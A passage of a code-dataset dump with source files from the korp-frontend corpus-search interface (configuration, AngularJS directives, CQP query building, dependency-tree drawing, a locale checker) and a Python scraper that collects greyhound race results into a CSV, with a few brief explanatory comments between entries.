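module.exports = {
  myDep, // runtime-loaded mode files pick this up from common.js
};
```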
{
"alpha_fraction": 0.5753180384635925,
"alphanum_fraction": 0.5938931107521057,
"avg_line_length": 23.5625,
"blob_id": "3b483eb3b4dfc0cdf72711d5d7dca6895688fb7a",
"content_id": "ffb56b1c91af51b9ccb6c73e8390837c36bd7e89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3930,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 160,
"path": "/app/config.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "const isLab = window.isLab || false;\n\nsettings.autocomplete = true;\nsettings.newMapEnabled = isLab;\nsettings.hitsPerPageDefault = 25;\nsettings.hitsPerPageValues = [25,50,75,100,500,1000];\nsettings.enableBackendKwicDownload = false;\nsettings.enableFrontendKwicDownload = true;\n\nsettings.languages = [`en`];\nsettings.defaultLanguage = `en`;\n\nsettings.downloadFormats = [\n `csv`,\n `tsv`,\n `annot`,\n `ref`,\n];\n\nsettings.downloadFormatParams = {\n \"*\": {\n structs: `+`,\n },\n ref: {\n format: `bibref,xls`,\n },\n csvp: {\n format: `tokens,csv`,\n attrs: `+,-lex`,\n match_marker: `***`,\n },\n csv: {\n format: `sentences,csv`,\n },\n annot: {\n format: `tokens,xls`,\n attrs: `+,-lex`,\n match_marker: `***`,\n },\n nooj: {\n attrs: `+`,\n },\n tsv: {\n format: `sentences,tsv`,\n },\n vrt: {\n attrs: `+`,\n },\n};\n\n// for extended search dropdown, can be 'union' or 'intersection'\nsettings.wordAttributeSelector = `union`;\nsettings.structAttributeSelector = `union`;\n\n// for 'compile statistics by' selector, can be 'union' or 'intersection'\nsettings.reduceWordAttributeSelector = `intersection`;\nsettings.reduceStructAttributeSelector = `intersection`;\n\nsettings.filterSelection = `intersection`;\n\nsettings.newsDeskUrl = `https://svn.spraakdata.gu.se/sb-arkiv/pub/component_news/json/korpnews.json`;\n\nsettings.wordpictureTagset = {\n // supported pos-tags\n verb: `vb`,\n\n noun: `nn`,\n adjective: `jj`,\n adverb: `ab`,\n preposition: `pp`,\n\n // dependency releations\n subject: `ss`,\n object: `obj`,\n adverbial: `adv`,\n preposition_rel: `pa`,\n pre_modifier: `at`,\n post_modifier: `et`,\n adverbial2: `aa`,\n};\n\n\nsettings.wordPictureConf = {\n verb: [[\n { rel: `subject`, css_class: `color_blue` },\n `_`,\n { rel: `object`, css_class: `color_purple` },\n { rel: `adverbial`, css_class: `color_green` },\n ]],\n noun: [\n [{ rel: `preposition_rel`, css_class: `color_yellow`, field_reverse: true },\n { rel: `pre_modifier`, css_class: `color_azure` },\n `_`,\n { rel: `post_modifier`, css_class: `color_red` }],\n\n [`_`, { rel: `subject`, css_class: `color_blue`, field_reverse: true, alt_label: `vb` }],\n [{ rel: `object`, css_class: `color_purple`, field_reverse: true, alt_label: `vb` }, `_`],\n ],\n adjective: [\n [`_`, { rel: `pre_modifier`, css_class: `color_yellow`, field_reverse: true }],\n [{ rel: `adverbial2`, css_class: `color_purple` }, `_`],\n ],\n adverb: [\n [`_`, { rel: `adverbial`, css_class: `color_yellow`, field_reverse: true }],\n [`_`, { rel: `adverbial2`, css_class: `color_purple`, field_reverse: true }],\n ],\n preposition: [[`_`, { rel: `preposition_rel`, css_class: `color_green` }]],\n\n};\n\nsettings.visibleModes = 6;\nsettings.modeConfig = [\n {\n localekey: `modern_texts`,\n mode: `default`,\n },\n {\n localekey: `parallel_texts`,\n mode: `parallel`,\n },\n];\n\nsettings.primaryColor = `rgb(221, 233, 255)`;\nsettings.primaryLight = `rgb(242, 247, 255)`;\n\nsettings.defaultOverviewContext = `1 sentence`;\nsettings.defaultReadingContext = `1 paragraph`;\n\nsettings.defaultWithin = {\n sentence: `sentence`,\n};\n\nsettings.spContext = {\n \"1 sentence\": `1 sentence`,\n \"1 paragraph\": `1 paragraph`,\n};\n\n// for optimization purposes\nsettings.cqpPrio = [`deprel`, `pos`, `msd`, `suffix`, `prefix`, `grundform`, `lemgram`, `saldo`, `word`];\n\nsettings.defaultOptions = {\n is: `=`,\n is_not: `!=`,\n starts_with: `^=`,\n contains: `_=`,\n ends_with: `&=`,\n matches: `*=`,\n matches_not: `!*=`,\n};\n\nsettings.korpBackendURL = 
`https://korp-backend.altlab.dev`;\nsettings.downloadCgiScript = `https://ws.spraakbanken.gu.se/ws/korp/download`;\n\nsettings.mapCenter = {\n lat: 62.99515845212052,\n lng: 16.69921875,\n zoom: 4,\n};\n\nsettings.readingModeField = `sentence_id`;\n"
},
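In the `config.js` entry above, `settings.downloadFormatParams` keeps options shared by all formats under the `"*"` key next to per-format entries. A hypothetical lookup helper illustrating how such a table can be resolved (the merge step is not part of `config.js` itself):

```js
// Resolve download parameters: shared "*" options first, then the
// format-specific entry layered on top.
function paramsFor(format, table) {
  return Object.assign({}, table["*"], table[format] || {});
}

const table = { "*": { structs: "+" }, csv: { format: "sentences,csv" } };
console.log(paramsFor("csv", table));
// -> { structs: "+", format: "sentences,csv" }
```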
{
"alpha_fraction": 0.5480754375457764,
"alphanum_fraction": 0.5524388551712036,
"avg_line_length": 38.61111068725586,
"blob_id": "cdd67a65f1e4b879c5112112b0eac3bdebd9887d",
"content_id": "6048ae540b1e60247a320d75f160e19ba0ec2a91",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6424,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 162,
"path": "/app/scripts/filter_directives.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst plusImg = require(\"../img/plus.png\")\n\nkorpApp.filter(\"replaceEmpty\", function () {\n return function (input) {\n if (input === \"\") {\n return \"–\"\n } else {\n return input\n }\n }\n})\n\nkorpApp.directive(\"globalFilters\", (globalFilterService) => ({\n restrict: \"E\",\n scope: {\n lang: \"=\",\n },\n template: `\\\n<div ng-if=\"dataObj.showDirective\" class=\"global-filters-container\">\n <span style=\"font-weight: bold;\"> {{ 'global_filter' | loc:lang}}:</span>\n <div style=\"display: inline-block\">\n <span ng-repeat=\"filterKey in dataObj.selectedFilters\">\n <global-filter lang=\"lang\" attr=\"filterKey\"\n attr-value=\"dataObj.filterValues[filterKey].value\",\n attr-label=\"getFilterLabel(filterKey)\",\n possible-values=\"dataObj.filterValues[filterKey].possibleValues\"\n translation-key=\"getTranslationKey(filterKey)\"\n closeable=\"isOptionalFilter(filterKey)\"/>\n <span ng-if=\"getAvailableFilters().length !== 0 || !$last\">{{\"and\" | loc:lang}}</span>\n </span>\n\n <span uib-dropdown auto-close=\"outsideClick\" ng-if=\"getAvailableFilters().length !== 0\">\n <span uib-dropdown-toggle style=\"vertical-align: sub;\">\n <img src=\"#{plusImg}\">\n </span>\n <div uib-dropdown-menu class=\"korp-uib-dropdown-menu\">\n <ul>\n <li ng-repeat=\"value in getAvailableFilters()\" ng-click=\"addNewFilter(value)\" class=\"attribute\">\n <span>{{getFilterLabel(value) | loc:lang }}</span>\n </li>\n </ul>\n </div>\n </span>\n <span style=\"margin-left: 5px; vertical-align: top;\" ng-if=\"dataObj.selectedFilters.length == 0\">Välj ett filter</span>\n\n </div>\n <div ng-if=\"false\">\n <img src=\"#{plusImg}\">\n <span style=\"font-weight: bold\" > {{'add_filter' | loc:lang}}</span>\n </div>\n</div>`,\n link(scope, element, attribute) {\n globalFilterService.registerScope(scope)\n\n scope.dataObj = { showDirective: false }\n\n scope.update = (dataObj) => (scope.dataObj = dataObj)\n\n scope.getFilterLabel = (filterKey) => scope.dataObj.attributes[filterKey].settings.label\n\n scope.getTranslationKey = (filterKey) =>\n scope.dataObj.attributes[filterKey].settings.translationKey || \"\"\n\n scope.removeFilter = (filter) => globalFilterService.removeFilter(filter)\n\n scope.getAvailableFilters = () =>\n _.filter(\n scope.dataObj.optionalFilters,\n (filter) => !scope.dataObj.selectedFilters.includes(filter)\n )\n\n scope.isOptionalFilter = (filterKey) =>\n scope.dataObj.optionalFilters.indexOf(filterKey) > -1 &&\n scope.dataObj.defaultFilters.indexOf(filterKey) === -1\n\n scope.addNewFilter = (value) => globalFilterService.addNewFilter(value, true)\n },\n}))\n\nkorpApp.directive(\"globalFilter\", (globalFilterService) => ({\n restrict: \"E\",\n scope: {\n attr: \"=\",\n attrLabel: \"=\",\n attrValue: \"=\",\n possibleValues: \"=\",\n lang: \"=\",\n translationKey: \"=\",\n closeable: \"=\",\n },\n template: `\\\n<span uib-dropdown auto-close=\"outsideClick\" on-toggle=\"dropdownToggle(open)\">\n <button uib-dropdown-toggle class=\"btn btn-sm btn-default global-filter-toggle\">\n <span ng-if=\"attrValue.length == 0\">\n <span>{{ \"add_filter_value\" | loc:lang }}</span>\n <span>{{attrLabel | loc:lang}}</span>\n </span>\n <span ng-if=\"attrValue.length != 0\">\n <span style=\"text-transform: capitalize\">{{attrLabel | loc:lang}}:</span>\n <span ng-repeat=\"selected in attrValue\" class=\"selected-attr-value\">{{translationKey + selected | loc:lang | replaceEmpty }} </span>\n </span>\n <i ng-if=\"closeable\" class=\"close_btn fa fa-times-circle-o fa-1\" 
ng-click=\"removeFilter($event)\" />\n </button>\n <div uib-dropdown-menu class=\"korp-uib-dropdown-menu\">\n <ul>\n <li ng-repeat=\"value in possibleValues\" ng-class=\"selected\" class=\"attribute\"\n ng-click=\"toggleSelected(value[0], $event)\"\n ng-if=\"isSelectedList(value[0])\">\n <span ng-if=\"isSelected(value[0])\">✔</span>\n <span>{{translationKey + value[0] | loc:lang | replaceEmpty }}</span>\n <span style=\"font-size: x-small;\">{{value[1]}}</span>\n </li>\n <li ng-repeat=\"value in possibleValues\" class=\"attribute\"\n ng-click=\"toggleSelected(value[0], $event)\"\n ng-if=\"!isSelectedList(value[0]) && value[1] > 0\">\n <span ng-if=\"isSelected(value[0])\">✔</span>\n <span>{{translationKey + value[0] | loc:lang | replaceEmpty }}</span>\n <span style=\"font-size: x-small;\">{{value[1]}}</span>\n </li>\n <li ng-repeat=\"value in possibleValues\" class=\"attribute disabled\"\n ng-if=\"!isSelectedList(value[0]) && value[1] == 0\"\n >\n <span>{{translationKey + value[0] | loc:lang | replaceEmpty }}</span>\n <span style=\"font-size: x-small;\">{{value[1]}}</span>\n </li>\n </ul>\n </div>\n</span>`,\n\n link(scope, element, attribute) {\n // if scope.possibleValues.length > 20\n // # TODO enable autocomplete\n\n scope.selected = _.clone(scope.attrValue)\n scope.dropdownToggle = function (open) {\n if (!open) {\n scope.selected = []\n return scope.attrValue.map((value) => scope.selected.push(value))\n }\n }\n\n scope.toggleSelected = function (value, event) {\n if (scope.isSelected(value)) {\n _.pull(scope.attrValue, value)\n } else {\n scope.attrValue.push(value)\n }\n event.stopPropagation()\n globalFilterService.valueChange(scope.attr)\n }\n\n scope.isSelected = (value) => scope.attrValue.includes(value)\n\n scope.isSelectedList = (value) => scope.selected.includes(value)\n\n scope.removeFilter = function (event) {\n event.stopPropagation()\n scope.$parent.removeFilter(scope.attr)\n }\n },\n}))\n"
},
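One caveat in the entry above: the directive's template literal interpolates `#{plusImg}` — CoffeeScript-style syntax that a JavaScript template string renders literally — so the plus icon only resolves if this is changed to `${plusImg}`. The value-toggling logic of `globalFilter`, sketched without lodash:

```js
// toggleSelected: remove the value when already chosen, append otherwise
// (the directive uses _.pull / push for the same effect).
function toggleSelected(selected, value) {
  const i = selected.indexOf(value);
  if (i !== -1) selected.splice(i, 1);
  else selected.push(value);
  return selected;
}

console.log(toggleSelected(["nn"], "vb"));       // ["nn", "vb"]
console.log(toggleSelected(["nn", "vb"], "nn")); // ["vb"]
```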
{
"alpha_fraction": 0.4496520757675171,
"alphanum_fraction": 0.45292672514915466,
"avg_line_length": 32.69655227661133,
"blob_id": "5d5e670db2f39271a1f3fc937f426cf9ca606897",
"content_id": "2512a3855b3084a019f3f2bc3a4dd64592bd8ffd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4890,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 145,
"path": "/app/config/statistics_config.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nlet getCqp = function(hitValues, ignoreCase) {\n var tokens = []\n for (var i = 0; i < hitValues.length; i++) {\n var token = hitValues[i]\n var andExpr = []\n for (var attribute in token) {\n if (token.hasOwnProperty(attribute)) {\n var values = token[attribute]\n andExpr.push(reduceCqp(attribute, values, ignoreCase))\n }\n }\n tokens.push(\"[\" + andExpr.join(\" & \") + \"]\")\n }\n return \"(\" + tokens.join(\" \") + \")\"\n}\n\nlet reduceCqp = function(type, tokens, ignoreCase) {\n let attrs = settings.corpusListing.getCurrentAttributes()\n if (attrs[type] && attrs[type].stats_cqp) {\n return attrs[type].stats_cqp(tokens, ignoreCase)\n }\n switch (type) {\n case \"saldo\":\n case \"prefix\":\n case \"suffix\":\n case \"lex\":\n case \"lemma\":\n case \"sense\":\n if (tokens[0] === \"\") return \"ambiguity(\" + type + \") = 0\"\n else var res\n if (tokens.length > 1) {\n var key = tokens[0].split(\":\")[0]\n\n var variants = []\n _.map(tokens, function(val) {\n parts = val.split(\":\")\n if (variants.length == 0) {\n for (var idx = 0; idx < parts.length - 1; idx++) variants.push([])\n }\n for (var idx = 1; idx < parts.length; idx++) variants[idx - 1].push(parts[idx])\n })\n\n variants = _.map(variants, function(variant) {\n return \":(\" + variant.join(\"|\") + \")\"\n })\n\n res = key + variants.join(\"\")\n } else {\n res = tokens[0]\n }\n return type + \" contains '\" + res + \"'\"\n case \"word\":\n let s = 'word=\"' + regescape(tokens[0]) + '\"'\n if (ignoreCase) s = s + \" %c\"\n return s\n case \"pos\":\n case \"deprel\":\n case \"msd\":\n return $.format('%s=\"%s\"', [type, tokens[0]])\n case \"text_blingbring\":\n case \"text_swefn\":\n return $.format('_.%s contains \"%s\"', [type, tokens[0]])\n default:\n // assume structural attribute\n return $.format('_.%s=\"%s\"', [type, tokens[0]])\n }\n}\n\n// Get the html (no linking) representation of the result for the statistics table\nlet reduceStringify = function(type, values, structAttributes) {\n let attrs = settings.corpusListing.getCurrentAttributes()\n if (attrs[type] && attrs[type].stats_stringify) {\n return attrs[type].stats_stringify(values)\n }\n\n switch (type) {\n case \"word\":\n case \"msd\":\n return values.join(\" \")\n case \"pos\":\n var output = _.map(values, function(token) {\n return $(\"<span>\")\n .localeKey(\"pos_\" + token)\n .outerHTML()\n }).join(\" \")\n return output\n case \"saldo\":\n case \"prefix\":\n case \"suffix\":\n case \"lex\":\n case \"lemma\":\n case \"sense\":\n if (type == \"saldo\" || type == \"sense\") {\n var stringify = util.saldoToString\n } else if (type == \"lemma\") {\n stringify = lemma => lemma.replace(/_/g, \" \")\n } else {\n stringify = util.lemgramToString\n }\n\n var html = _.map(values, function(token) {\n if (token === \"\") return \"–\"\n return stringify(token.replace(/:.*/g, \"\"), true)\n })\n\n return html.join(\" \")\n\n case \"deprel\":\n var output = _.map(values, function(token) {\n return $(\"<span>\")\n .localeKey(\"deprel_\" + token)\n .outerHTML()\n }).join(\" \")\n return output\n case \"msd_orig\": // TODO: OMG this is corpus specific, move out to config ASAP (ASU corpus)\n var output = _.map(values, function(token) {\n return $(\"<span>\")\n .text(token)\n .outerHTML()\n }).join(\" \")\n return output\n default:\n // structural attributes\n var prefix = \"\"\n if (structAttributes.translationKey) prefix = structAttributes.translationKey\n var mapped = _.map(values, function(value) {\n if (structAttributes[\"set\"] && value === 
\"\") {\n return \"–\"\n } else if (value === \"\") {\n return \"-\"\n } else if (loc_data[\"en\"][prefix + value]) {\n return util.getLocaleString(prefix + value)\n } else {\n return value\n }\n })\n return mapped.join(\" \")\n }\n}\n\nexport default {\n getCqp,\n reduceStringify\n}\n"
},
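The `"word"` branch of `reduceCqp` above shows the general shape of the generated CQP: a quoted attribute test, with `%c` appended for case-insensitive matching. A standalone sketch — the `regescape` stand-in here only approximates Korp's utility of the same name:

```js
// Build a CQP word condition; %c makes the match case-insensitive.
const regescape = (s) => s.replace(/[.|?*+()[\]{}$^\\]/g, "\\$&");

function wordCqp(token, ignoreCase) {
  let s = `word="${regescape(token)}"`;
  if (ignoreCase) s += " %c";
  return s;
}

console.log(wordCqp("gå?", true)); // word="gå\?" %c
```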
{
"alpha_fraction": 0.5318902134895325,
"alphanum_fraction": 0.5440664887428284,
"avg_line_length": 25.664947509765625,
"blob_id": "ac41bb491a6ba0898e9de5d217e514c22ff29a6f",
"content_id": "0cad505cef2985a251c38537324f2b9dc659ff28",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5174,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 194,
"path": "/app/lib/deptrees/deptrees.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-return-assign,\n no-undef,\n standard/array-bracket-even-spacing,\n*/\n// TODO: This file was created by bulk-decaffeinate.\n// Fix any style issues and re-enable lint.\n/*\n * decaffeinate suggestions:\n * DS101: Remove unnecessary use of Array.from\n * DS102: Remove unnecessary code created because of implicit returns\n * DS205: Consider reworking code to avoid use of IIFEs\n * DS207: Consider shorter variations of null checks\n * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md\n */\n\n// Draw the sentence in sent\n//\n// If hover_fun is given, then it will be invoked with arguments of the form\n// { deprel: 'AA' } and { pos: 'PN' }\nwindow.draw_deptree = function(sent, hover_fun) {\n\n // console.log \"Drawing\", sent, window\n\n if (hover_fun == null) { hover_fun = function() {} }\n const sent_id = \"magic_secret_id\"\n\n const deprel_div = $(\"<div>\").attr(\"id\", sent_id)\n\n $('body').empty().append(deprel_div)\n\n return draw_brat_tree(sent, sent_id, hover_fun)\n}\n\n\nwindow.sentence_xml_to_json = sent =>\n _.map($(sent).children(), function(word) {\n const obj = { word: word.textContent }\n _.map([\"pos\", \"ref\", \"dephead\", \"deprel\"], attr => obj[attr] = $(word).attr(attr))\n return obj\n })\n\n\n// Initialise brat\n$(document).ready(head.js)\n\nconst webFontURLs = [\n \"lib/brat/static/fonts/Astloch-Bold.ttf\",\n \"lib/brat/static/fonts/PT_Sans-Caption-Web-Regular.ttf\",\n \"lib/brat/static/fonts/Liberation_Sans-Regular.ttf\"\n]\n\n// words are from one sentence and are Strings with extra attributes\n// including rel, dephead and deprel and pos\nconst color_from_chars = function(w, sat_min, sat_max, lightness) {\n let v = 1.0\n let hue = 0.0\n let sat = 0.0\n const len = w.length\n let i = 0\n\n while (i < len) {\n v = v / 26.0\n sat += ((w.charCodeAt(i)) % 26) * v\n hue += ((w.charCodeAt(i)) % 26) * (1.0 / 26 / len)\n i++\n }\n hue = hue * 360\n sat = (sat * (sat_max - sat_min)) + sat_min\n const color = $.Color({\n hue,\n saturation: sat,\n lightness\n })\n return color.toHexString(0)\n}\n\n// Makes a brat entity from a positional attribute\nconst make_entity_from_pos = p =>\n ({\n type: p,\n labels: [p],\n bgColor: color_from_chars(p, 0.8, 0.95, 0.95),\n borderColor: \"darken\"\n })\n\n\n// Makes a brat relation from a dependency relation\nconst make_relation_from_rel = r =>\n ({\n type: r,\n labels: [r],\n color: \"#000000\",\n args: [{\n role: \"parent\",\n targets: []\n },\n {\n role: \"child\",\n targets: []\n }\n ]\n })\n\n\n// from http://stackoverflow.com/a/1830844/165544\nconst isNumber = n => (!isNaN(parseFloat(n))) && isFinite(n)\n\n// Draws a brat tree from a XML words array to a div given its id\nvar draw_brat_tree = function(words, to_div, hover_fun) {\n\n let word\n const entity_types = []\n const relation_types = []\n const entities = []\n const relations = []\n const added_pos = []\n const added_rel = []\n\n const add_word = function(word, start, stop) {\n\n // console.log \"Adding word\", word, start, stop\n\n const [pos,ref,dephead,deprel] = Array.from(([\"pos\", \"ref\", \"dephead\", \"deprel\"].map((attr) => word[attr])))\n\n if (!_.contains(added_pos, pos)) {\n added_pos.push(pos)\n entity_types.push(make_entity_from_pos(pos))\n }\n\n if (!_.contains(added_rel, deprel)) {\n added_rel.push(deprel)\n relation_types.push(make_relation_from_rel(deprel))\n }\n\n const entity = [`T${ref}`, pos, [[start, stop]]]\n entities.push(entity)\n\n if (isNumber(dephead)) {\n const relation =\n 
[ `R${ref}`, deprel,\n [ [\"parent\", `T${dephead}` ],\n [\"child\", `T${ref}`]\n ]\n ]\n return relations.push(relation)\n }\n }\n\n const text = ((() => {\n const result = []\n for (word of Array.from(words)) {\n result.push(word.word)\n }\n return result\n })()).join(\" \")\n let ix = 0\n for (word of Array.from(words)) {\n const len = word.word.length\n add_word(word, ix, ix + len)\n ix += len + 1\n }\n\n const collData = {\n entity_types,\n relation_types\n }\n\n const docData = {\n text,\n entities,\n relations\n }\n\n return head.ready(function() {\n\n const dispatcher = Util.embed(to_div, collData, docData, webFontURLs)\n\n const div = $(`#${to_div}`)\n // Set up hover callbacks\n return dispatcher.on('doneRendering', function() {\n\n _.map(div.find(\"g.arcs\").children(), function(g) {\n const deprel = $(g).find(\"text\").data(\"arc-role\")\n return $(g).hover(() => hover_fun({ deprel }))\n })\n\n return _.map(div.find(\"g.span text\"), function(g) {\n const pos = $(g).text()\n return $(g).parent().hover(() => hover_fun({ pos }))\n })\n })\n })\n}\n\n"
},
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 25.846153259277344,
"blob_id": "b2097d470f0b125694ed5e94a1f26a49727b430f",
"content_id": "f756c780d7690100414c6f247a74e6c709449104",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 26,
"path": "/app/translations/check_locale_files.py",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\nimport os, json\nfrom glob import glob\n\nfileset = (\"locale\", \"corpora\")\n\n\ndef check(setname):\n print \"checking \" + setname\n mapping = dict((fName, set(json.load(open(fName)))) for fName in glob(setname + \"*.json\"))\n \n def check_key(key, fromLang):\n for fName, json_set in mapping.items():\n if fromLang != fName:\n if key not in json_set:\n print \"The key '%s' is in file %s but not in file %s\" % (key, fromLang, fName)\n \n \n for fName, json_set in mapping.items():\n for json_key in json_set:\n check_key(json_key, fName)\n\nprint \"Ok.\"\n\nfor name in fileset:\n check(name)"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 20,
"blob_id": "1efa231d8205521fe9fd7ddc9ef6704836d55a63",
"content_id": "99ac4bb66a62829f5ac1314ea6f9f4c48634cff7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 21,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 1,
"path": "/app/lib/leaflet-settings.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "L_DISABLE_3D = true;\n"
}
] | 27 |
brunowenzel07/greyhound | https://github.com/brunowenzel07/greyhound | a2eeed6d60e97ef6829bbd073ed5ea9be55f4ae2 | 7e0d42b8bd15484557a81995cb2e03e4f9605dec | 8a42afdf937f34a7ed6da6e0660d339ff37f7b8e | refs/heads/master | 2022-03-10T03:03:29.586758 | 2019-11-18T18:15:40 | 2019-11-18T18:15:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8032786846160889,
"alphanum_fraction": 0.8032786846160889,
"avg_line_length": 29.5,
"blob_id": "e3a408f7042c8be805fc1a954cc4d9bc1050d230",
"content_id": "60b56bf4a141ab17d784fcd67732545de9f7ecae",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 61,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 2,
"path": "/README.md",
"repo_name": "brunowenzel07/greyhound",
"src_encoding": "UTF-8",
"text": "# greyhound\nScraper to fetch dog-race data from the internet\n"
},
{
"alpha_fraction": 0.5672979354858398,
"alphanum_fraction": 0.5823469758033752,
"avg_line_length": 24.584415435791016,
"blob_id": "e725a4d2d4901ab5279c2492c38d6abd441bef56",
"content_id": "5ea0b54d370fbab41343be944a42bb826e5eaaef",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5914,
"license_type": "permissive",
"max_line_length": 160,
"num_lines": 231,
"path": "/work/raceScraper.py",
"repo_name": "brunowenzel07/greyhound",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ## Routine declarations \n\n# In[25]:\n\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta, date\nimport sys\nimport pandas as pd\nimport time\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200 \n and content_type is not None \n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors. \n This function just prints them, but you can\n make it do anything.\n \"\"\"\n print(e)\n \nadd_link = \"bulli/2033\"\nrace_date = \"11-11-1111\"\n\n\ncol = ['date','race_name','race_number','race_place', 'rug', 'dog_name', 'dog_trainer', 'time', 'mgn', 'split', 'inRun', 'wgt', 'sire', 'dam', 'sp']\nall_data = pd.DataFrame([],columns=col)\n\n\n# ## Function to scrape from the internet race_name-wise\n\n# In[26]:\n\n\ndef race_scrape():\n base_link = \"https://thegreyhoundrecorder.com.au/results/\"\n\n race_name = add_link\n link = base_link+add_link\n print(link)\n\n raw_html = simple_get(link) #Connection complete\n print(len(raw_html))\n\n html = BeautifulSoup(raw_html, 'html.parser')\n\n html_file_name='race.html'\n orig_stdout = sys.stdout\n f = open(html_file_name, 'w')\n sys.stdout = f\n\n print(html.prettify())\n\n sys.stdout = orig_stdout\n f.close()\n\n\n\n\n\n raceContent = html.findAll('div',{\"class\": \"resultsDesktopContent tabs\"})[0]\n\n raceTable = raceContent.findAll('table')\n no_of_races = int(len(raceTable)/2)\n #print(no_of_races)\n\n\n i=0 # race iterator\n while(i<no_of_races):\n\n # ##printing the unique race header\n\n raceHeader = raceTable[2*i]\n raceHeader = raceHeader.findAll('td')\n #print(len(raceHeader))\n\n raceNumber = raceHeader[0].decode_contents()\n raceSubName = raceHeader[1].decode_contents()\n raceLength = raceHeader[2].decode_contents()\n raceHeaderCategory = raceHeader[3].decode_contents()\n\n raceBets = raceHeader[4].decode_contents()\n raceBets = raceBets.replace(' ','')\n raceBets = raceBets[:(raceBets.rfind('-')+1)]+raceBets[raceBets.rfind('$'):] #output formating\n\n raceSplits = raceHeader[5].decode_contents()\n #print(raceNumber+raceSubName+raceLength+raceHeaderCategory+raceBets+raceSplits)\n\n #raceHeader is not included in the CSV at the moment\n \n raceBody = raceTable[2*i+1]\n raceBody = raceBody.find('tbody')\n rows = raceBody.findAll('tr')\n no_of_rows = len(rows)\n\n #printing the rest of the table\n\n j = 0 #row iterator\n while(j<no_of_rows):\n current_row = rows[j].findAll('td')\n\n #print(current_row)\n\n race_place = current_row[0].decode_contents()\n rug = current_row[1].decode_contents()\n dog_name = current_row[2].find('a')['href'][12:]\n dog_trainer = current_row[3].find('a')['href'][10:]\n \n if(race_place!='SCR'): \n time = current_row[4].decode_contents()\n mgn = current_row[5].decode_contents()\n split = 
current_row[6].decode_contents()\n inRun = current_row[7].decode_contents()\n wgt = current_row[8].decode_contents()\n sire = current_row[9].find('a')['href'][12:]\n dam = current_row[10].find('a')['href'][12:]\n sp = current_row[11].find('p').decode_contents()[2:]\n \n else: #if its SCR all these contents do not exist\n time = 'blank'\n mgn = 'blank'\n split = 'blank'\n inRun = 'blank'\n wgt = 'blank'\n sire = 'blank'\n dam = 'blank'\n sp = 'blank'\n\n #print(race_place+' '+rug+' '+dog_name+' '+dog_trainer+' '+time+' '+mgn+' '+split+' '+inRun+' '+wgt+' '+sire+' '+dam+' '+sp)\n\n df2 = pd.DataFrame([[race_date, race_name, (i+1), race_place, rug, dog_name, dog_trainer, time, mgn, split, inRun, wgt, sire, dam, sp]],columns=col)\n global all_data # to prevent local creation\n all_data = all_data.append(df2) #appending the table row\n j=j+1\n i=i+1\n \n\n\n# In[27]:\n\n\nprint(all_data) # to check if the df is created properly and has no prior content on it\n\n\n# ### fetching the date-list \n\n# In[28]:\n\n\ndateFile = pd.read_csv('date.csv') \nprint(dateFile)\n\n\n# ## All-date iterator \n\n# In[30]:\n\n\nt = time.process_time() # keeping a track of time\n\nlen_of_date = len(dateFile)\nk=0\nwhile(k<len_of_date): #iterate among all the dates in the dateFile\n print(dateFile.iloc[k,0])\n if(dateFile.iloc[k,0].find('/')==-1): #if the line is a date or a link\n race_date = dateFile.iloc[k,0] \n else:\n add_link = dateFile.iloc[k,0]\n race_scrape()\n k=k+1\n \n \nelapsed_time = time.process_time() - t\n\n\n# ### storing to CSV\n\n# In[ ]:\n\n\nall_data.to_csv('january_2016.csv',index=False)\n\n\n# In[33]:\n\n\nprint(all_data)\n\n\n# ## Total number of minutes it took \n\n# In[36]:\n\n\nprint(elapsed_time/60) # amount of time it took for all of this 